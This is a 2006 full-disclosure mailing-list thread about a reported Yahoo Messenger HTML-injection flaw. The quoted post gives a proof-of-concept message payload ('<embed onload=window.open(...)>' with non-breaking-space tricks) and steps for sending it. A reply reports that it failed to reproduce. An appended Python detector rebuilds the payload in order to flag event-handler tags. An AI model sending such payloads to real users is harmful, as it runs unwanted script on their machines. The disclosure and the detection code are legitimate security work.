Open Source and information security mailing list archives
Date: Fri, 28 Jul 2006 11:20:11 -0500
From: "John Dietz" <www.whitewolf@...il.com>
To: "Ivan Ivan" <ivancool2003@...oo.com.ar>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Yahoo messenger serious bug

I just tried this in Messenger 7.0 and it never opened a browser window. I
copied the text exactly from here and made sure the space after helomsg was
[Alt]+0160, and the most I could get it to do was a Yahoo Search on the
string. The other side sees:

s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:
---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:
---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
Yahoo! Search: No results were found for helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:
---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:
---------------------------------------------<embed
onload=window.open('http:\\\\google.com/')>helomsg
:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(.

There must be some other setting on either Messenger or the computer itself
for this to work as you say. Possibly a setting for Messenger to use your
default browser for searches instead of the PM window?

Cheers


On 7/28/06, Ivan Ivan <ivancool2003@...oo.com.ar> wrote:
>
> Hi,
> I found another vulnerability in Yahoo Messenger: if
> you receive a private message with this string
>
> "helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> onload=window.open
> ('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> onload=window.open
> ('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?("
> (without quotes), Yahoo Messenger in this case opens
> google.com in the remote victim's Internet
> Explorer.
>
> Yahoo messenger bug proof of concept:
>
> 1. Open Messenger and log in.
>
> 2. Open a third-party Yahoo chat client such as YahElite over
> the YMSGR protocol and log in with another account.
>
> 3. Send a PM to the Messenger account with this
> string: s: helomsg
>
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> onload=window.open('http:\\\\google.com/')>helomsg
>
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> onload=window.open('http:\\\\google.com/')>helomsg
> :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
>
> 4. The remote user will open www.google.com (you can
> change this)
>
> Note: the space in "helomsg :" must be created with
> Alt+0160, and the one in "s: " is a regular space
>
>
> s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> onload=window.open
> ('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed
> onload=window.open
> ('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
>
> Tested in Yahoo Messenger 7.0/7.5
>
>
> Regards.
>
>
>
>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
There is intelligence in having all the answers, but wisdom lies in
knowing which of the questions to answer.

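As an added example (not code from the original post, the reply above, or Yahoo), here is a small Python check of the kind a receiving client or a gateway could run on an incoming IM body: it scans for HTML tags that carry an `on*` event-handler attribute, which is the shape of the posted payload (`<embed onload=...>`). Whitespace is folded before matching, U+00A0 included, on the assumption that the Alt+0160 character the post calls for is acting as a space substitute; the sample message is a constructed reproduction of the posted string (dash count approximate), and the `img onerror` and `a onclick` cases go beyond the post to show the same check on other handlers. `render_safe` is a hypothetical fix on the rendering side, not anything the page attributes to Yahoo.

```python
import html
import re

NBSP = "\u00a0"  # the Alt+0160 character the post calls for

# Constructed reproduction of the posted payload (dash count approximate).
_JUNK = ":+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?("
_EMBED = "<embed onload=window.open('http:" + "\\" * 4 + "google.com/')>"
PAYLOAD = ("helomsg" + NBSP + _JUNK + "msg:" + "-" * 45 + _EMBED) * 2 + "helomsg" + NBSP + _JUNK

# Deliberately permissive: unquoted attribute values and any Unicode whitespace,
# because a chat client's HTML renderer is at least that lenient. The check
# therefore leans toward false positives rather than misses.
_TAG_RE = re.compile(r"<\s*([A-Za-z][\w:-]*)\b([^>]*)>", re.DOTALL)
_HANDLER_RE = re.compile(
    r"""\b(on[a-z]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.IGNORECASE
)


def normalize_whitespace(msg: str) -> str:
    """Fold every Unicode whitespace run (U+00A0 included) to one ASCII space.

    In a str pattern, \\s matches Unicode whitespace, so NBSP is covered; a check
    that only looked for ASCII spaces would treat '<embed\\xa0onload=...>' differently
    from '<embed onload=...>' even though a renderer may not.
    """
    return re.sub(r"\s+", " ", msg)


def find_event_handlers(msg: str) -> list:
    """Return (tag, attribute, value) for each HTML tag carrying an on* handler."""
    found = []
    for tag_match in _TAG_RE.finditer(normalize_whitespace(msg)):
        tag, attrs = tag_match.group(1).lower(), tag_match.group(2)
        for h in _HANDLER_RE.finditer(attrs):
            # Exactly one of the three value groups matched (double-, single- or unquoted).
            value = next(v for v in h.groups()[1:] if v is not None)
            found.append((tag, h.group(1).lower(), value))
    return found


def is_script_bearing(msg: str) -> bool:
    """True when the message would run script if the client rendered it as HTML."""
    return bool(find_event_handlers(msg))


def render_safe(msg: str) -> str:
    """Hypothetical receiving-side fix: escape markup before display, so that
    '<embed onload=...>' is shown as text rather than interpreted."""
    return html.escape(msg, quote=True)


if __name__ == "__main__":
    for tag, attr, value in find_event_handlers(PAYLOAD):
        print(f"flagged: <{tag}> {attr}={value}")
    print("rendered safely as:", render_safe(PAYLOAD)[:80], "...")
```

Run as a script it lists the two `embed`/`onload` pairs in the posted string; the functions are the reusable part and can be fed any message body. Escaping on display is the fix that removes the class of problem; the scanner only tells you that a given message would have triggered it.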

